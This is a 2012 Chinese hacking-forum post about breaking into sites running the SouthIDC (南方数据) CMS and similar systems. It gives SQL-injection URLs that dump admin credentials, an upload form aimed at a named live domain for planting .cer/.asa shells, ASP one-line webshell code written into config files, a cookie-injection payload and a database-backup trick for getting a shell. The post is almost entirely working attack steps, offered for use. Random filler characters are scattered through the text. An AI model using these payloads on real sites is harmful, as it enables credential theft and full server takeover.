找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2314|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb+ e% H; T1 `% ^
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 # g$ a7 j& |, l+ Y5 _
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
: |2 V# x2 ]3 I+ F0 H2 _. F直接暴管理员帐号密码(md5)
7 s2 G9 _5 I! B6 s% C  C2.登陆后台7 G5 x, W5 C" o! z4 Q/ g7 ~
3.利用编辑器上传:
! M7 d9 K0 t0 D7 ]' d2 z访问admin/southidceditor/admin_style.asp
, t6 u9 f* G0 W7 N6 E修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
  v1 p2 F& Z+ \5 I% `& F; k: e
1 h9 @# T. c/ h- j; r========================================
8 W% s- h' ], s2 U% K
7 C( `& k/ t3 d" j( f2 _; W% g参考资料整理:* n9 R" A: Q9 K
南方数据、良精系统、网软天下漏洞利用8 z$ g) |2 Y% Q5 ?* S1 E! Q) l
; K- y+ h/ H  D' Z7 c% l, T
1、通过upfile_other.asp漏洞文件直接取SHELL# F5 D' y2 ?) Z# z6 v0 T  U
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:* K5 i) `# F, _2 I' k
<HTML><HEAD>
, g* {) o3 x9 {+ t6 y! A$ }% t<META http-equiv=Content-Type content="text/html; charset=gb2312">
! W0 b. N( o3 ^& j<STYLE type=text/css>BODY {
/ N2 [4 \& k7 sFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee 0 P  Y4 k& l8 J& K
} + u' o6 C9 _. v$ V
.tx1 { 0 U( `) ^" f$ U7 H
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
' {3 e# c3 ]% D  N3 R( [8 ^1 B}
8 E! a% d7 d+ Y. B: G</STYLE>9 O/ k0 H5 H! O; c. u; \
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
& h7 t9 X6 D2 R) a$ P6 r( R) _<BODY leftMargin=0 topMargin=0> 8 D7 [3 B0 h/ W% P
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
+ G% D3 m+ ~2 \; B  K. c; _encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
2 \2 k2 W0 _" B' q8 [% Y$ ?/ F<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>* f- O7 Q& T7 }3 n: c* e( f

- Q7 [- f) i; y; ], F将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。5 R3 K6 X  ]& W- f
注:此方法通杀南方数据、良精系统、网软天下等
% h! u$ V; T3 I) J- ~- o% m
' m8 o) O, y. n0 s8 L2、通过注入秒杀管理员帐号密码,使用如下:! T  _( v. A. a/ I2 z
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’8 R0 a8 H+ e) }
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
: }* {' k! _" k6 r4 ^. q在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’- m$ F, D1 g, G
成功把shell写入http://www.target.com/inc/config.asp& M# O" Q- f+ K: F& K
这里一句话chr(32)密码是“#”2 G( W# Z. [4 B% C0 Z' u0 g1 G
3、cookie注入
8 q( \/ C' S" `1 _6 e清空地址栏,利用union语句来注入,提交:  [! R- C7 d6 V) j7 _8 a
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
# j1 L% n/ w1 b6 g# \如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
' o; F! H5 O: o$ q' {; c( ~注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。( l6 @! b6 q7 F$ a
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
# a1 n: o5 f  T9 K
* d9 d) G9 R; `# Z三、后台取SHELL方法总结! n$ E4 ?' I$ u% u$ {' [- `8 N$ ^
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:+ v2 E  M) \$ Y9 j% M, I1 p+ [
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,0 D$ B, T! K4 V3 B2 b; v, [
这时再打开一句话马的客户端,提交同样得到一个小马* c7 d  F' e- P" J1 N3 X& o
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
) \" \- L0 k# b6 j8 R) H(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:
" P' d6 {+ Z1 l$ H$ v! Rif fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then) i' H5 Y$ m, |# x& a* j& T
EnableUpload=false% l, V4 D/ r& g& |" \
# v" W- ?- s) y$ n$ D$ O
end if 3 J: Y; z, [3 A6 p" f% M& D
if EnableUpload=false then; j; _! y0 d+ _9 P& H5 T
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
# B1 `+ G7 S; _$ UFoundErr=true
! i  R6 J8 f7 g' N$ I6 A7 Mend if
" K# X8 y9 \7 I大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:0 P( K0 `5 J4 r
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)7 i& G3 O  @" e( f
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的
: z6 V0 a* m  X8 ^2 I" a0 F/ Q0 K) V1 [9 F
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的' ~; R4 V: x; F6 n/ k
直接访问备份后的地址,就得到一个webshell( H5 W& d  K8 z: z1 E
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表